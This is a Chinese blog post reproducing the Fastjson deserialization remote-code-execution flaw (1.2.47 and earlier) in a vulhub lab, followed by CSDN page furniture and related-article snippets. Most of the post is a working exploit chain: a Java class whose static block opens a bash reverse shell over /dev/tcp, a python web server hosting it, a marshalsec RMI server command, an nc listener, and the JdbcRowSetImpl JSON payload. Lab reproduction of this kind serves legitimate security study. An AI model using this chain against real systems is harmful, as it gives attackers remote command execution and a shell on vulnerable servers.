fastjson反序列化漏洞复现

于 2024-05-20 12:05:24 发布
阅读量409 收藏 5
点赞数 5
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70349048/article/details/139059760
版权

参考文章:

http://t.csdnimg.cn/12Ehl

https://www.cnblogs.com/karsa/p/15983486.html

漏洞原理:

Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。

影响 Fastjson1.2.47以及之前的版本

启动vulhub靶场

访问对应的服务

然后需要kali环境 包括java1.8版本和maven环境,详见之前的博客或者最上方文章

在/marshalsec-master/target/目录下面创建TouchFile.java文件

import java.lang.Runtime;

import java.lang.Process;

public class TouchFile {

    static {

        try {

            Runtime rt = Runtime.getRuntime();

            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/反弹IP/1888 0>&1"};

            Process pc = rt.exec(commands);

            pc.waitFor();

        } catch (Exception e) {

            // do nothing

        }

    }

}

然后使用javac编译成.class文件

在TouchFile.java所在目录,使用python搭建web服务

python3 -m http.server 8001

访问kali的web服务可以看到恶意.class文件

开启RMI服务监听9999端口(将RMI服务与刚才用python搭建的网站绑定到一块)

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.87.128:8001/#TouchFile" 9999

nc监听
nc -lnvp 1888

进行攻击

访问我们第一步搭建的存在fastjson反序列化漏洞的靶场,用burp suite抓包然后:

更改GET类型为POST

更改为Content-Type: application/json

往抓包里面写入poc:

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.87.128:9999/TouchFile",
        "autoCommit":true
    }
}

发送之后我们可以看到:

成功反弹shell了,至此复现结束!

就不做程序猿
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Fastjson 1.2.22-24 反序列化漏洞分析
遇事不决冲冲冲
04-29 2289
FastJson在 1.2.22 - 1.2.24 版本中存在反序列化漏洞,主要原因FastJson支持的两个特性: fastjson反序列化时,JSON字符串中的 @type 字段,用来表明指定反序列化的目标恶意对象类。 fastjson反序列化时,字符串时会自动调用恶意对象的构造方法, setter 方法, getter 方法, 若这类方法中存在利用点,即可完成漏洞利用。 主要存在两种利用方式: JdbcRowSetImpl(JNDI) TemplatesImpl(Feature.SupportNonP
fastjson 系列漏洞
最新发布
SHELLCODE_8BIT的博客
11-14 1966
jackson 和 fastjson 在序列化的时候,先利用反射找到对象类的所有 get 方法,接下来去 get,然后小写化,作为 json 的每个 key 值,而 get 方法的返回值作为 value。接下来再反射 field,添加到 json 中。
fastJson漏洞之@type
weixin_45650737的博客
04-12 2776
public class User { private String name; public User() { System.out.println("com.hundsun.ifs.management.server.User()"); } public String getName() { System.out.println("getName"); return name; } public voi
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 2989
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
[Java安全]—fastjson漏洞利用
Sentiment的博客
07-03 5406
这两天要出去就不再学新东西了,正好两点睡不着了,起来学学fastjson弥补一些接下来的内容。Fastjson 组件是阿里巴巴开发的反序列化与序列化组件Fastjson组件在反序列化不可信数据时会导致远程代码执行。究其原因:依赖 POJO POJO 是 Plain OrdinaryJava Object 的缩写,但是它通指没有使用 Entity Beans 的普通 java 对象,可以把 POJO 作为支持业务逻辑的协助类Demo 结果: test1可以看到调用时会自动调用对应的其次是若加上,则返回的内容除
Fastjson反序列化漏洞史1
08-03
然而,Fastjson在过去的几年里曾曝出一系列的反序列化漏洞,这些漏洞可能被攻击者利用,执行任意代码,从而对系统安全构成威胁。 在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的...
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
# Fastjson反序列化漏洞为例 1、此时/tmp目录 ![img]...
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
在Spring MVC中,Fastjson是一个常用的JSON库,用于序列化和反序列化Java对象。当我们在处理日期时间字段时,可能会遇到反序列化时日期格式不一致的问题,导致默认显示为时间戳。本文将详细介绍两种解决Spring MVC中...
Fastjson存在远程代码执行高危安全漏洞
安全学习之路
03-17 5551
Fastjson安全漏洞通告
Fastjson 1.2.24 反序列化(CVE-2017-18349)漏洞复现
MD@@nr丫卡uer
12-28 1459
fastjson简介       fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。 影响范围       fastjsonfastjson<=1.2.24 漏洞复现 使用vulhub cd /app/vulhub-20201028/fastjson/1.2
fastjson远程代码执行漏洞问题分析
lucasma的博客
03-01 5192
背景 fastjson远程代码执行安全漏洞(以下简称RCE漏洞),最早是官方在2017年3月份发出的声明, security_update_20170315 没错,强如阿里这样的公司也会有漏洞。代码是人写的,有漏洞是难免的。关键是及时的修复。 声明中,官方指出: 最近发现fastjson在1.2.24以及之前版本存在远程代码执行高危安全漏洞,为了保证系统安全,请升级到1.2.28/1.2.29...
Fastjson RCE漏洞的绕过史
systemino的博客
07-17 6080
Author:平安银行应用安全团队-Glassy 引言 最近一段时间fastjson一度成为安全圈的热门话题,作为一个是使用十分广泛的jar包,每一次的RCE漏洞都足以博得大众的眼球,关于fastjson每次漏洞的分析也已经早有大牛详细剖析,本文章旨在顺着17年fastjson第一次爆出漏洞到现在为止,看一下fastjson的缝缝补补,瞻仰一下大佬们和安全开发人员的斗智斗勇,对期间的...
FastJson远程命令执行漏洞学习笔记
m0_73257876的博客
09-04 674
fastjson漏洞其实就是fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类中连接远程主机,通过其中的恶意类执行代码。笔记只做学习记录分享。如有错误,请大家批评指正!
fastjson 安全漏洞
regrethh的博客
07-16 3960
本文转载自微信公众号Hollis,作者Hollis。如果有侵权,请联系我,立马删除。 fastjson大家一定都不陌生,这是阿里巴巴的开源一个JSON解析库,通常被用于将Java Bean和JSON 字符串之间进行转换。 前段时间,fastjson被爆出过多次存在漏洞,很多文章报道了这件事儿,并且给出了升级建议。 但是作为一个开发者,我更关注的是他为什么会频繁被爆漏洞?于是我带着疑惑,去看了下fastjson的releaseNote以及部分源代码。 最终发现,这其实和fastjson中的一个AutoType
Fastjson漏洞
weixin_43873557的博客
02-06 5151
Fastjson概述 Fastjson是阿里巴巴公司开源的一款json解析器,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到JavaBean。 ➢历史漏洞 Fastjson <=1.2.24 反序列化远程命令执行漏洞 Fastjson <=1.2.41 反序列化远程命令执行漏洞 Fastjson <=1.2.42 反序列化远程命令执行漏洞 Fastjson <=1.2.43 反序列化远程命令执行漏洞
fastjson到底做错了什么?为什么会被频繁爆出漏洞
热门推荐
HollisChuang's Blog
07-06 2万+
GitHub 15.8k Star 的Java工程师成神之路,不来了解一下吗! GitHub 15.8k Star 的Java工程师成神之路,真的不来了解一下吗! GitHub 15.8k Star 的Java工程师成神之路,真的真的不来了解一下吗! fastjson大家一定都不陌生,这是阿里巴巴的开源一个JSON解析库,通常被用于将Java Bean和JSON 字符串之间进行转换。 前段时间,fastjson被爆出过多次存在漏洞,很多文章报道了这件事儿,并且给出了升级建议。 但是作为一个开发者,我更关注的
fastjson漏洞解决—2020年5月28日
06-08 1万+
一、前言 fastjson真是不让人省心,2020年5月28日又报了漏洞fastjson的作用: 将javabean序列化为json格式的字符串。 将json格式的字符串,反序列化为javabean。 二、fastjson使用过程 添加maven依赖: <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <v
Fastjson反序列化漏洞复现
07-22
对不起,我无法提供有关Fastjson反序列化漏洞的具体复现方法。这种漏洞是一个安全问题,使用它可能会导致系统被攻击者利用。为了保护系统的安全,建议及时升级Fastjson版本或使用其他替代方案来解决这个问题。如果您需要了解更多关于Fastjson反序列化漏洞的信息,建议您查阅相关的安全资料和公开的安全公告。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值